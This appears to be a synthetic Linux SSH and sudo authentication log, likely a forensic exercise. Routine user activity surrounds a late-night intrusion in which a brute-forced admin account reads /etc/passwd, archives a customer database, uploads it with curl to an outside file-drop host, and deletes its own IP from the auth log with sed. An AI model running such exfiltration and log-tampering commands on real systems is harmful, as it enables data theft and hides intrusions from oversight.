// Authentication log showing login attempts and user actions
Apr 08 08:12:05 server sshd[5231]: Accepted password for jsmith from 192.168.1.45
Apr 08 08:15:23 server sudo: jsmith : USER=jsmith ; COMMAND=/usr/bin/apt update
Apr 08 09:23:41 server sshd[5267]: Accepted password for mwilson from 192.168.1.67
Apr 08 09:25:12 server sudo: mwilson : USER=mwilson ; COMMAND=/bin/cat /var/log/syslog
Apr 08 10:02:19 server sshd[5295]: Accepted password for tjenkins from 192.168.1.89
Apr 08 10:05:34 server sudo: tjenkins : USER=tjenkins ; COMMAND=/usr/bin/find /home/tjenkins -name "*.doc"
Apr 08 11:43:56 server sshd[5347]: Failed password for agarcia from 192.168.1.73
Apr 08 11:44:12 server sshd[5349]: Failed password for agarcia from 192.168.1.73
Apr 08 11:44:28 server sshd[5351]: Accepted password for agarcia from 192.168.1.73
Apr 08 12:32:15 server sshd[5478]: Accepted password for jsmith from 192.168.1.45
Apr 08 12:37:42 server sudo: jsmith : USER=jsmith ; COMMAND=/bin/ls -la /var/www/html
Apr 08 13:14:23 server sshd[5517]: Accepted password for bthomas from 192.168.1.55
Apr 08 13:15:07 server sudo: bthomas : USER=bthomas ; COMMAND=/usr/bin/vim /home/bthomas/projects/notes.txt
Apr 08 14:23:51 server sshd[5598]: Accepted password for slee from 192.168.1.91
Apr 08 14:26:18 server sudo: slee : USER=slee ; COMMAND=/bin/grep "error" /var/log/apache2/error.log
Apr 08 15:45:22 server sshd[6025]: Accepted password for admin from 192.168.1.100
Apr 08 15:47:35 server sudo: admin : USER=root ; COMMAND=/usr/sbin/service apache2 restart
Apr 08 16:12:04 server sshd[6102]: Accepted password for tjenkins from 192.168.1.89
Apr 08 16:15:21 server sudo: tjenkins : USER=tjenkins ; COMMAND=/bin/cp /home/tjenkins/report.pdf /shared/documents/
Apr 08 17:34:19 server sshd[6189]: Accepted password for agarcia from 192.168.1.73
Apr 08 17:36:42 server sudo: agarcia : USER=agarcia ; COMMAND=/usr/bin/du -sh /var/log
Apr 08 18:21:37 server sshd[6256]: Accepted password for mwilson from 192.168.1.67
Apr 08 18:22:59 server sudo: mwilson : USER=mwilson ; COMMAND=/bin/cat /etc/hosts
Apr 08 19:03:12 server sshd[6301]: Failed password for unknown user from 203.0.113.17
Apr 08 19:03:27 server sshd[6303]: Failed password for unknown user from 203.0.113.17
Apr 08 19:45:33 server sshd[6345]: Accepted password for bthomas from 192.168.1.55
Apr 08 19:47:14 server sudo: bthomas : USER=bthomas ; COMMAND=/usr/bin/tail -f /var/log/syslog
Apr 08 21:12:19 server sshd[6423]: Failed password for root from 45.132.192.14
Apr 08 21:12:33 server sshd[6425]: Failed password for root from 45.132.192.14
Apr 08 21:12:47 server sshd[6427]: Failed password for root from 45.132.192.14
Apr 08 22:34:51 server sshd[6489]: Accepted password for admin from 192.168.1.100
Apr 08 22:37:12 server sudo: admin : USER=root ; COMMAND=/usr/sbin/iptables -L
Apr 08 23:15:47 server sshd[6544]: Failed password for admin from 198.51.100.72
Apr 08 23:17:12 server sshd[6547]: Failed password for admin from 198.51.100.72
Apr 08 23:18:36 server sshd[6551]: Failed password for admin from 198.51.100.72
Apr 08 23:19:45 server sshd[6553]: Accepted password for admin from 198.51.100.72 SUSPICIOUS_LOGIN_TIME
Apr 08 23:23:19 server sudo: admin : USER=root ; COMMAND=/bin/ls -la /etc/
Apr 08 23:27:42 server sudo: admin : USER=root ; COMMAND=/bin/ls -la /home/
Apr 09 00:12:35 server sudo: admin : USER=root ; COMMAND=/usr/bin/find /home -type f -name "*.xlsx" -o -name "*.csv"
Apr 09 00:47:21 server sudo: admin : USER=root ; COMMAND=/bin/cat /etc/passwd
Apr 09 01:15:41 server sudo: admin : USER=root ; COMMAND=/bin/tar -czvf /tmp/secret_archive.tar.gz customer_database.xlsx
Apr 09 01:17:28 server sudo: admin : USER=root ; COMMAND=/usr/bin/curl -F "file=@/tmp/secret_archive.tar.gz" https://file-drop.competitor.com/upload
Apr 09 01:23:14 server sudo: admin : USER=root ; COMMAND=/bin/rm /tmp/secret_archive.tar.gz
Apr 09 01:38:42 server sudo: admin : USER=root ; COMMAND=/usr/bin/find /var/log -type f -name "auth.log*" -exec grep -l "198.51.100.72" {} \;
Apr 09 01:42:17 server sudo: admin : USER=root ; COMMAND=/usr/bin/sed -i '/198\.51\.100\.72/d' /var/log/auth.log.1
Apr 09 02:35:19 server sshd[6780]: Disconnected from user admin 198.51.100.72
Apr 09 07:23:45 server sshd[6923]: Accepted password for slee from 192.168.1.91
Apr 09 07:25:31 server sudo: slee : USER=slee ; COMMAND=/usr/bin/systemctl status apache2
Apr 09 08:03:19 server sshd[6978]: Failed password for mwilson from 192.168.1.67
Apr 09 08:03:32 server sshd[6980]: Accepted password for mwilson from 192.168.1.67
Apr 09 08:45:12 server sshd[7012]: Accepted password for jsmith from 192.168.1.45
Apr 09 08:47:23 server sudo: jsmith : USER=jsmith ; COMMAND=/bin/ls -la /home/jsmith/documents
Apr 09 09:12:37 server sshd[7056]: Accepted password for tjenkins from 192.168.1.89
Apr 09 09:14:12 server sudo: tjenkins : USER=tjenkins ; COMMAND=/usr/bin/top